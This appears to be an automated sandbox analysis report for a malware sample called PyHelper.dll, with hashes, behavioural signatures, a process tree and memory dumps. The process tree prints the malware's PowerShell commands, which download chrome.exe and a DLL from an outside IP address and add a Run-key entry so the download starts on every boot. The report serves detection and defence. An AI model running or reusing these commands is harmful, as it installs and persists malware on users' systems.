Analysis
-
max time kernel
727s -
max time network
1596s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
11-05-2024 10:41
Static task
static1
Behavioral task
behavioral1
Sample
PyHelper.dll
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
PyHelper.dll
Resource
win7-20240221-en
Behavioral task
behavioral3
Sample
PyHelper.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral4
Sample
PyHelper.dll
Resource
win11-20240508-en
General
-
Target
PyHelper.dll
-
Size
236KB
-
MD5
b7bd2243978cfe44cc0d4b28086c4004
-
SHA1
bbc0f43de71cddc0a1be48fa98b936ebffb817ac
-
SHA256
bfeaf1fe93923425053e245e2ccefae72a65f75edad1f1689c55c4f0a1e84455
-
SHA512
e7f924564bcf1a6173cf29bbbcb16994b3e527a93c1059e7be8e86aa5f5887a852a6a9084862caf3e192a5a70336e6ee22bc169c1f1e0300fa72bb9049a0141f
-
SSDEEP
3072:aSro30CSFTVOo7qzijtY7HBGsBel05YGoAgbceBBCxRXu+E+NO9o6Kgv:akoELH7k8tY7HkLljr1CTbE55
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 30 1616 powershell.exe 31 520 powershell.exe 32 1196 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepid process 1616 powershell.exe 520 powershell.exe 1196 powershell.exe -
Downloads MZ/PE file
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\Documents\\chrome.exe" powershell.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 1616 powershell.exe 3064 powershell.exe 1196 powershell.exe 520 powershell.exe 3064 powershell.exe 520 powershell.exe 1616 powershell.exe 1196 powershell.exe 3064 powershell.exe 520 powershell.exe 1616 powershell.exe 1196 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1616 powershell.exe Token: SeDebugPrivilege 3064 powershell.exe Token: SeDebugPrivilege 1196 powershell.exe Token: SeDebugPrivilege 520 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
regsvr32.exeRuntimeBroker.exedescription pid process target process PID 208 wrote to memory of 2544 208 regsvr32.exe RuntimeBroker.exe PID 208 wrote to memory of 2544 208 regsvr32.exe RuntimeBroker.exe PID 208 wrote to memory of 2544 208 regsvr32.exe RuntimeBroker.exe PID 208 wrote to memory of 2544 208 regsvr32.exe RuntimeBroker.exe PID 208 wrote to memory of 2544 208 regsvr32.exe RuntimeBroker.exe PID 208 wrote to memory of 2544 208 regsvr32.exe RuntimeBroker.exe PID 2544 wrote to memory of 1616 2544 RuntimeBroker.exe powershell.exe PID 2544 wrote to memory of 1616 2544 RuntimeBroker.exe powershell.exe PID 2544 wrote to memory of 1196 2544 RuntimeBroker.exe powershell.exe PID 2544 wrote to memory of 1196 2544 RuntimeBroker.exe powershell.exe PID 2544 wrote to memory of 520 2544 RuntimeBroker.exe powershell.exe PID 2544 wrote to memory of 520 2544 RuntimeBroker.exe powershell.exe PID 2544 wrote to memory of 3064 2544 RuntimeBroker.exe powershell.exe PID 2544 wrote to memory of 3064 2544 RuntimeBroker.exe powershell.exe
Processes
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\PyHelper.dll1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\RuntimeBroker.exeRuntimeBroker.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-C "Invoke-WebRequest -Uri "http://62.133.61.130:80/files/addons/chrome_elf.dll" -OutFile "$env:USERPROFILE\Documents\chrome_elf.dll""3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-C "Invoke-WebRequest -Uri "http://62.133.61.130:80/files/addons/chrome.exe" -OutFile "$env:USERPROFILE\Documents\chrome.exe""3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-C "Invoke-WebRequest -Uri "http://62.133.61.130:80/files/addons/105.0.5195.102.manifest" -OutFile "$env:USERPROFILE\Documents\105.0.5195.102.manifest""3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-C "New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "update" -Value "$env:USERPROFILE\Documents\chrome.exe" -PropertyType "String" -Force"3⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD55d574dc518025fad52b7886c1bff0e13
SHA168217a5f9e9a64ca8fed9eefa4171786a8f9f8f7
SHA256755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2
SHA51221de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5c2a0895dd601c9bfa22352c472c6fc5a
SHA1e9ecd26c4c3333d9dcaee95dff114813af7a9eaf
SHA256ad05818cdd39080d26c75b3260d38a31e991f81c23b5ed34e1fe7f2f2a61a10a
SHA5128e2ecc93e19c445e2f3a97912e101180f5a9e46099cb112993f75758525f0d9cf33feb89d128eb94075bf53f42c9f253100380eb5c71f6581f4b4fa2344205c4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
536B
MD5d908fa4be1a0ccf57ba13cad033901c7
SHA1847ab3b123c95ff7c6ff66ce4e64e2a0fc746ca7
SHA25653225ff1ab4c6afd787c84b7110cd20e9ff59158cca86451c5991d2bb4f6611e
SHA5128e9c43705197be93f700752fdbcaa25d3d8c60e8a2a78e9cc09591fbe0bad60c2715cf1bc8e8cc323657eda701858125466e042bb4a8010e9443a213e81a6ac4
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bqnbx2jr.wkl.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
memory/208-5-0x0000000062540000-0x0000000062598000-memory.dmpFilesize
352KB
-
memory/208-6-0x0000000062540000-0x0000000062598000-memory.dmpFilesize
352KB
-
memory/208-4-0x0000000062540000-0x0000000062598000-memory.dmpFilesize
352KB
-
memory/208-12-0x0000000062540000-0x0000000062598000-memory.dmpFilesize
352KB
-
memory/208-20-0x0000000062540000-0x0000000062598000-memory.dmpFilesize
352KB
-
memory/1616-51-0x0000021CC1020000-0x0000021CC1042000-memory.dmpFilesize
136KB
-
memory/2544-9-0x000001D49A060000-0x000001D49A061000-memory.dmpFilesize
4KB
-
memory/2544-24-0x000001D49A090000-0x000001D49A0AD000-memory.dmpFilesize
116KB
-
memory/2544-23-0x00007FFDED465000-0x00007FFDED466000-memory.dmpFilesize
4KB
-
memory/2544-13-0x000001D49A030000-0x000001D49A04A000-memory.dmpFilesize
104KB
-
memory/2544-14-0x000001D49A090000-0x000001D49A0AD000-memory.dmpFilesize
116KB
-
memory/2544-10-0x00007FFDED465000-0x00007FFDED466000-memory.dmpFilesize
4KB
-
memory/2544-8-0x000001D49A050000-0x000001D49A051000-memory.dmpFilesize
4KB
-
memory/3064-54-0x0000028555720000-0x0000028555796000-memory.dmpFilesize
472KB